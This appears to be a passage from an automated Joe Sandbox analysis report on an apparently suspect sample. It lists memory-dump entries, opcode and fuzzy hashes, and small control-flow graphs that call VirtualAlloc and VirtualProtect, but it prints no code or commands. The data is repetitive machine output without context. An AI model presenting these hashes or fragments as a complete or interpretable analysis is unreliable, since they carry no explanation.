                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2264cb006c71eacd1bfac796884f6f31109dcca2d93e954d23ad4d0db12bf321
                                        • Instruction ID: e2e68d846a13682d3b52ff39418b01126b98cbc79694053375206bde34f1e59d
                                        • Opcode Fuzzy Hash: 2264cb006c71eacd1bfac796884f6f31109dcca2d93e954d23ad4d0db12bf321
                                        • Instruction Fuzzy Hash: 5A01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3264DB71E594CB81
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bad8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9b8617e3a1d0ac07a623f9abf83764b5ee31fe9ef348091dd75e4d830b257d8
                                        • Instruction ID: 8675c86f6b6990f87db1dd3797440b1733e7d27fec611dce62a1a16c23eb8d9f
                                        • Opcode Fuzzy Hash: d9b8617e3a1d0ac07a623f9abf83764b5ee31fe9ef348091dd75e4d830b257d8
                                        • Instruction Fuzzy Hash: CF01867091968D8FDB51EF68C8596D97FF0FF28305F0105AAE808C72A1D734E550CB41
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2022309761.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 808f569cc8882f0d8e4d4335fdf85fb241a41c3e58087ce26f962336c707de29

                                        Execution Graph

                                        Execution Coverage:3.3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:7
                                        Total number of Limit Nodes:1
                                        execution_graph 32186 7ffd9bab3b4d 32187 7ffd9bab3b22 32186->32187 32188 7ffd9bab3b6b VirtualAlloc 32186->32188 32190 7ffd9bab3c85 32188->32190 32182 7ffd9bab215e 32183 7ffd9bab216d VirtualProtect 32182->32183 32185 7ffd9bab22ad 32183->32185

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,$4
                                        • API String ID: 0-508195717
                                        • Opcode ID: 4985ef3e85a3bb6403968fd1f6ba02c12a432853adf08e894753a5b4c2089844
                                        • Instruction ID: fb91ce7af5f18deab48a3ed39dc454ca76874416f6a5efefad9df1d5c834724b
                                        • Opcode Fuzzy Hash: 4985ef3e85a3bb6403968fd1f6ba02c12a432853adf08e894753a5b4c2089844
                                        • Instruction Fuzzy Hash: 42412870A0964DCFDB64DF94C8A4BE9BBF1EF58314F1141AAC04A972A1DB74AA85CF00

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 61a6cbf40b73c00847830904718e2071fd8e3daf4be30fb9a5c8e1c07610e69d
                                        • Instruction ID: af876abd23c06f3141cce28c850d529954f2a1329b540713e95a949f7110937d
                                        • Opcode Fuzzy Hash: 61a6cbf40b73c00847830904718e2071fd8e3daf4be30fb9a5c8e1c07610e69d
                                        • Instruction Fuzzy Hash: A4D10631B19E4E4FDBA8DB5C98A4AF537D2FF98314B0502BAD40DC7296DE28EC458340

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 7ffd9bab215e-7ffd9bab216b 399 7ffd9bab2176-7ffd9bab2187 398->399 400 7ffd9bab216d-7ffd9bab2175 398->400 401 7ffd9bab2189-7ffd9bab2191 399->401 402 7ffd9bab2192-7ffd9bab22ab VirtualProtect 399->402 400->399 401->402 407 7ffd9bab22ad 402->407 408 7ffd9bab22b3-7ffd9bab2303 402->408 407->408
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baab000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
                                        • Instruction ID: a3a8d8865e590d5d3471f2f92529e77cfd9e00168a56ab10e557507077b19d1c
                                        • Opcode Fuzzy Hash: a5e1f5290be3bf6a5e90ab962f78431ddc96f6343e1ad74f1f6f7a167a74393c
                                        • Instruction Fuzzy Hash: 87517D70D0874D8FDB54DFA8D845AEDBBF1FB6A310F1042AAD048E7256DB74A885CB81

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: afdd5343bc8a5c75bc8aaefee34eb70da4c605301d62b251783cdaf327bb898f
                                        • Instruction ID: f33fcc34a07a90a1c13e4f33019a61a820a249ae894cb647d78fdb251e3a2867
                                        • Opcode Fuzzy Hash: afdd5343bc8a5c75bc8aaefee34eb70da4c605301d62b251783cdaf327bb898f
                                        • Instruction Fuzzy Hash: 9AC13832B0EB8D4FDB64DB6898751ED7FE1EF99314F0901BAD088D72A3EE2859018351

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 475 7ffd9bab3b4d-7ffd9bab3b69 476 7ffd9bab3b6b-7ffd9bab3c83 VirtualAlloc 475->476 477 7ffd9bab3b22-7ffd9bab3b4a 475->477 483 7ffd9bab3c85 476->483 484 7ffd9bab3c8b-7ffd9bab3cef 476->484 483->484
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAAB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baab000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: bab02022056cf30fb71f95ac44541f2b08040488b88c6d1bbc824a9801636cfd
                                        • Instruction ID: 592cba376e88f55dea59d54cdcf2f654ec8b6529310f599bc19ed04e794c805f
                                        • Opcode Fuzzy Hash: bab02022056cf30fb71f95ac44541f2b08040488b88c6d1bbc824a9801636cfd
                                        • Instruction Fuzzy Hash: F1512930908A1C8FDF94EF98D885BE9BBF1FB69310F1041AAD00DE3255DB71A9858F80

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 58e459b42c8def36458a5a198364da886120b5d4aabbd1028bfb7a3bf5b0f993
                                        • Instruction ID: 3d32e18ca75a6824845d3e507878ea340d1cdddfd381a8b621f546d12d4a1cd5
                                        • Opcode Fuzzy Hash: 58e459b42c8def36458a5a198364da886120b5d4aabbd1028bfb7a3bf5b0f993
                                        • Instruction Fuzzy Hash: 61515C31B1EB8E0FEB9ADB6884656B97BE1FF94354B0005FAD05CCB1D7DE28A8048340

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A
                                        • API String ID: 0-3554254475
                                        • Opcode ID: d3932b0d3d001648d1f7acd64b552761c3594a29e254acebb161d338b8d62d77
                                        • Instruction ID: 9e6011293ed5d1b912f182030a75567d3a9099c2d862e98efb5af13a47ab616f
                                        • Opcode Fuzzy Hash: d3932b0d3d001648d1f7acd64b552761c3594a29e254acebb161d338b8d62d77
                                        • Instruction Fuzzy Hash: C6112622B1EF1E0BDFA8DA5C54682BA6BC1EB98221B0101BFE44DC32A5ED59AC014380

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: e210c1d6078d76b323f7f80a8aef11267e7c0eb4f25a77cfb602e3532870d21b
                                        • Instruction ID: c2b10477872b1ced0cb470b2ca5450738e25d499293f22aac88f899a8e57bed1
                                        • Opcode Fuzzy Hash: e210c1d6078d76b323f7f80a8aef11267e7c0eb4f25a77cfb602e3532870d21b
                                        • Instruction Fuzzy Hash: 6F11047161EBC95FE7558769D4202A67FE1EFC5250F0801BFE088C62E7DAADDA058342

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 623 7ffd9baf6219-7ffd9baf6257 624 7ffd9baf6259 623->624 625 7ffd9baf625e-7ffd9baf627a 623->625 624->625 626 7ffd9baf6280-7ffd9baf628d 625->626
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 6b0ee83df71f54152e70d322329248de73e68887257b8643930e52a13bd8450e
                                        • Instruction ID: 1a3838d8456dcac49b6f7152c5fec1b23c5d37dbccb05f7809e6364e319b60c6
                                        • Opcode Fuzzy Hash: 6b0ee83df71f54152e70d322329248de73e68887257b8643930e52a13bd8450e
                                        • Instruction Fuzzy Hash: E2115E30918A4D8FCF85EF68C858AE97BF0FF28305F0101AAD458D72A1D734A554CB80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 619 7ffd9baf6139-7ffd9baf6177 620 7ffd9baf6179 619->620 621 7ffd9baf617e-7ffd9baf619a 619->621 620->621 622 7ffd9baf61a0-7ffd9baf61ad 621->622
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 0b6d0802899723fbf1f88d0d55663cbd8446fd97a12a3da0b81a5ab4932d744e
                                        • Instruction ID: 8dd9773d4b4babcbbe5bb6505858c94d0d6b602230966c788fe18a1d62f0943d
                                        • Opcode Fuzzy Hash: 0b6d0802899723fbf1f88d0d55663cbd8446fd97a12a3da0b81a5ab4932d744e
                                        • Instruction Fuzzy Hash: FD113C30918A8D8FCF85EF68C858AEA7BF0FF29305F0501AAD458D72A1D734A554CB80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 646 7ffd9baf6ce9-7ffd9baf6d1f 647 7ffd9baf6d26-7ffd9baf6d3e 646->647 648 7ffd9baf6d21 646->648 649 7ffd9baf6d44-7ffd9baf6d51 647->649 648->647
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: 8fbb3d53ba154e55253e7b2d4a2326a9579c94eb5fd2ec224af85f772fe115a4
                                        • Instruction ID: 63150d81c31e2e708df19dffdffb29aadd694bbd5f915c9c379b92cbba5a924c
                                        • Opcode Fuzzy Hash: 8fbb3d53ba154e55253e7b2d4a2326a9579c94eb5fd2ec224af85f772fe115a4
                                        • Instruction Fuzzy Hash: EB012130918A8D8FCF85EF68C858AEA7FF0FF25305F4545AAD418D72A2D7749554CB80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: d86f4bc8cf7b41aa4ce58874a134d1778b061ea4d40775465d097e7e2ca54f70
                                        • Instruction ID: 0a119fdc2c713f1d57631e19edb310183b4d903380b8800d7ba5bb02715da474
                                        • Opcode Fuzzy Hash: d86f4bc8cf7b41aa4ce58874a134d1778b061ea4d40775465d097e7e2ca54f70
                                        • Instruction Fuzzy Hash: DFF0C260A1E78D9FEB61AB6088696E87FA0AF05301F4941FBD44CC60E3DA386244C712
                                        • Opcode Fuzzy Hash: c2ce1ddec1f5baebad8494477bbe33113823e1c17048d16b81c01cc3d7474da8
                                        • Instruction Fuzzy Hash: F3014C3090968C8FCF45EF28C865AD97FF0FF29304F0541AAE849C71A1DB34A994CB81
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1ead953b071645b1151f068910fe84c5e072a0603b80ef9f7ce716514e357e2
                                        • Instruction ID: d233f4fa2f5c60f08b4e45fbea9e1ced2bed34d32b4b8a3b396425e6a77c2c0b
                                        • Opcode Fuzzy Hash: b1ead953b071645b1151f068910fe84c5e072a0603b80ef9f7ce716514e357e2
                                        • Instruction Fuzzy Hash: 0601403091968C8FCF45DF58C859AD97FF0FF69305F0501AAD449C71A2D7359954CB41
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98de464c36605a1816f89f9768f5649bbb9cab732f7378f0398fb676417e07de
                                        • Instruction ID: b62c446e097d64005136d9f7cd5a41960a7a4dfa825e7b38708e99f0a4b86cfe
                                        • Opcode Fuzzy Hash: 98de464c36605a1816f89f9768f5649bbb9cab732f7378f0398fb676417e07de
                                        • Instruction Fuzzy Hash: 3901A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3260DB71E594CB81
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2264cb006c71eacd1bfac796884f6f31109dcca2d93e954d23ad4d0db12bf321
                                        • Instruction ID: e2e68d846a13682d3b52ff39418b01126b98cbc79694053375206bde34f1e59d
                                        • Opcode Fuzzy Hash: 2264cb006c71eacd1bfac796884f6f31109dcca2d93e954d23ad4d0db12bf321
                                        • Instruction Fuzzy Hash: 5A01A870914A4D9FDF84EF68C849AEE7BF0FB68305F00456AA81DD3264DB71E594CB81
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d12de8d2b47c73ab9aa2a80f3777141face6f2ca35ca1a609d1c2626beeb7aca
                                        • Instruction ID: 1d4f79333c5fde24308e08b98631f1adc08906253597da95fd363314233a8938
                                        • Opcode Fuzzy Hash: d12de8d2b47c73ab9aa2a80f3777141face6f2ca35ca1a609d1c2626beeb7aca
                                        • Instruction Fuzzy Hash: 91015E3090968D8FDB85EF68C858AA97FB0FF25301F0501DBD458C71A1DB349994CB40
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bf7cff90ebf61acf7dc0a031191f131e691316f2f7d3fa3447a1e6c5bcb9c00
                                        • Instruction ID: 462d84b5dc252b07c3edf43cef3e2f11d387c7f0db00731a976ad652b109a752
                                        • Opcode Fuzzy Hash: 8bf7cff90ebf61acf7dc0a031191f131e691316f2f7d3fa3447a1e6c5bcb9c00
                                        • Instruction Fuzzy Hash: 33017C3190978C8FCB85DF64C864AA97FB0FF25300F0501EAD408C72A2D634A994CB41
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07a06b865e8e49cdd8d4273124a0bd73a3ee726b46f9028f8d31092dc36d39d6
                                        • Instruction ID: 02b0c765362d911148eca4ec3c497e9570decb43ac6178819e9afe38f147feec
                                        • Opcode Fuzzy Hash: 07a06b865e8e49cdd8d4273124a0bd73a3ee726b46f9028f8d31092dc36d39d6
                                        • Instruction Fuzzy Hash: 9D01AF30A0964D9FCF84EF58C4A4AEA7BF0FF18304F1400AAE40DC32A1DB31A690CB81
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbb915fbfede7f24948074660513303b9a7ffb8a38c46f647ca8c7cc3bd58921
                                        • Instruction ID: c19042b342d182eedc0303a0b6e72edfa03d4f7a230d7fcf7e74c4814eafeb6f
                                        • Opcode Fuzzy Hash: cbb915fbfede7f24948074660513303b9a7ffb8a38c46f647ca8c7cc3bd58921
                                        • Instruction Fuzzy Hash: F5018F3090868C8FCB95EF64C8A9AA97FB0FF65300F4500EAD448C71A2CB349A94CB40
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9b03026e642f25da44e295852500ca2211665c0a886e5a43e279dafd08ed77a
                                        • Instruction ID: 52339dfd6f3851822bf6d4028b94d680625426bcf023bc419f450a86dba25a4d
                                        • Opcode Fuzzy Hash: f9b03026e642f25da44e295852500ca2211665c0a886e5a43e279dafd08ed77a
                                        • Instruction Fuzzy Hash: 67014B31A0968D8FDB95EF68C8546E97FB0FF55300F0505AAD418C72A6EB749A54CB40
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9e4f7f5bc44ba5fd5ac9d0e3d1689386f755b082b63519ce76e7861596abb9a
                                        • Instruction ID: dddf4400ce243015422369595079038ad4b5d7c9d9e76d6c9eef576ff39591d4
                                        • Opcode Fuzzy Hash: f9e4f7f5bc44ba5fd5ac9d0e3d1689386f755b082b63519ce76e7861596abb9a
                                        • Instruction Fuzzy Hash: F2011930914A4D9FCF84EF58C859AEA7BE0FF68305F01016AA40DD3260DB35A694CB80
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c157d2bdae35add81129f495f788514ff3117eea6113332dfeeca39dede9836
                                        • Instruction ID: fa1f88dfed1d38373534c8f3e9d0c81f7d2e7bac850aa69e2ab2fe63d98f8321
                                        • Opcode Fuzzy Hash: 9c157d2bdae35add81129f495f788514ff3117eea6113332dfeeca39dede9836
                                        • Instruction Fuzzy Hash: CB01C97091490D8FDF84EF58C848AAEBBF0FB68305F00456AA41DD32A4DB709690CB80
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c83f2794ff9070700c77329b7516756ea1c6f7139f57db45ce32e4a588b9f0dd
                                        • Instruction ID: 0106c64331c9c2ceb7b910ffd08938f7a506a134a20fac537d88c3b60cdf40e9
                                        • Opcode Fuzzy Hash: c83f2794ff9070700c77329b7516756ea1c6f7139f57db45ce32e4a588b9f0dd
                                        • Instruction Fuzzy Hash: 89F0E730914A4D9FCF84EF58C859AEA7BF0FB68305F0041AAA80DD3260DB31E694CB81
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15cccd002fe93da006191b32392443fc37dd25bd53bb16ca8c289a27feec90e2
                                        • Instruction ID: 397ea966f0880415f6ad377e37b4f8811d63d38468275db4d30e00321b4b0812
                                        • Opcode Fuzzy Hash: 15cccd002fe93da006191b32392443fc37dd25bd53bb16ca8c289a27feec90e2
                                        • Instruction Fuzzy Hash: 69F0EC30914A4D9FCF44EF58C859AE97BF0FF68305F00456AA80DD3260DB30E594CB81
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33622e42abbb3bfd61dc999bdca2882b6a4df3b016b3e85fbe29af27d9465a9a
                                        • Instruction ID: fe6e13d909a83838e6ea32e17c11563a7550af0841553bf0d3e463061398ad18
                                        • Opcode Fuzzy Hash: 33622e42abbb3bfd61dc999bdca2882b6a4df3b016b3e85fbe29af27d9465a9a
                                        • Instruction Fuzzy Hash: 68F0EC30A1490DCFCF84EF58C848AEE77F0FB68304F00056AA41DD3250DB709654CB80
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1c80a8bf99777f9a2fedd5cc3e3d5a66ba5266b7e42ff36eebc591cf4d51ff6
                                        • Instruction ID: ab58d17d0fe92d09338d4786c1564ee7630c3b4c32da37c8895c4af7b1a5acb4
                                        • Opcode Fuzzy Hash: c1c80a8bf99777f9a2fedd5cc3e3d5a66ba5266b7e42ff36eebc591cf4d51ff6
                                        • Instruction Fuzzy Hash: 8DF0BD3091494D9FDF84EF58C499AAA7BF1FB68305F5041AAE41DD31A0DB719694CB80
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0dff646c59fe16cf3a7c2ef7284b723d3e5ca84030295b61076a434b55affdab
                                        • Instruction ID: 630a63dfd972361e6dd9d5cbaaf61ef29bea959d8bf87355eb1aabc7dc09d830
                                        • Opcode Fuzzy Hash: 0dff646c59fe16cf3a7c2ef7284b723d3e5ca84030295b61076a434b55affdab
                                        • Instruction Fuzzy Hash: AAF0BD30A14A4D9FDF94EF58C454AEA7BF0FF58305F1041AAE41DD3260DB71A694CB80
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9af627059f82f3f9c41985f809b605fbb0d6c4b1c12e934007bbdc171c008f53
                                        • Instruction ID: 96884af26834d441bdaf0eff22005f158f0814284127834f2657edc9685d2275
                                        • Opcode Fuzzy Hash: 9af627059f82f3f9c41985f809b605fbb0d6c4b1c12e934007bbdc171c008f53
